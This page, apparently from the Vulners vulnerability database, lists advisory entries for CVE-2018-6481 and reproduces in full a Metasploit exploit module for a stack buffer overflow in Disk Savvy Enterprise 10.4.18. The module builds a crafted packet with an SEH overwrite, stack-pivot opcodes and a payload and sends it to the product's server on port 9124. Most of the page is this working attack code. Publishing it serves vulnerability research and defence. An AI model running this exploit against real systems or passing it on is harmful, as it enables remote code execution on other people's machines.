| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Exploit | 21 Feb 201800:00 | – | zdt | |
| CVE-2018-6481 | 6 Feb 202503:13 | – | circl | |
| Flexense Disk Savvy Enterprise Buffer Error Vulnerability | 1 Mar 201800:00 | – | cnvd | |
| CVE-2018-6481 | 27 Feb 201819:00 | – | cve | |
| CVE-2018-6481 | 27 Feb 201819:00 | – | cvelist | |
| Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitdb | |
| Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) | 21 Feb 201800:00 | – | exploitpack | |
| CVE-2018-6481 | 27 Feb 201819:29 | – | nvd | |
| CVE-2018-6481 | 27 Feb 201819:29 | – | osv | |
| Disk Savvy Enterprise 10.4.18 Buffer Overflow | 23 Feb 201800:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Savvy Enterprise v10.4.18',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in Disk Savvy Enterprise v10.4.18, caused by improper bounds
checking of the request sent to the built-in server. This module
has been tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x02\x0a\x0d\xf8",
'Space' => 800
},
'Referencess' =>
[
[ 'CVE', '2018-6481' ]
],
'Targets' =>
[
[ 'Disk Savvy Enterprise v10.4.18',
{
'Offset' => 124,
'Ret' => 0x10056d13
}
]
],
'Privileged' => true,
'DisclosureDate' => '2017-01-31',
'DefaultTarget' => 0))
register_options([Opt::RPORT(9124)])
end
def exploit
seh = generate_seh_record(target.ret)
connect
buffer = make_nops(target['Offset'])
buffer << seh
buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh
buffer << "\x83\xc4\x21" #ADD esp,21h
buffer << "\xff\xe4" #JMP esp
buffer << payload.encoded
buffer << Rex::Text.rand_text_alphanumeric(1)
header = "\x75\x19\xba\xab"
header << "\x03\x00\x00\x00"
header << "\x00\x40\x00\x00"
header << [buffer.length].pack("V")
header << [buffer.length].pack("V")
header << [buffer[-1].ord].pack("V")
packet = header
packet << buffer
sock.put(packet)
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation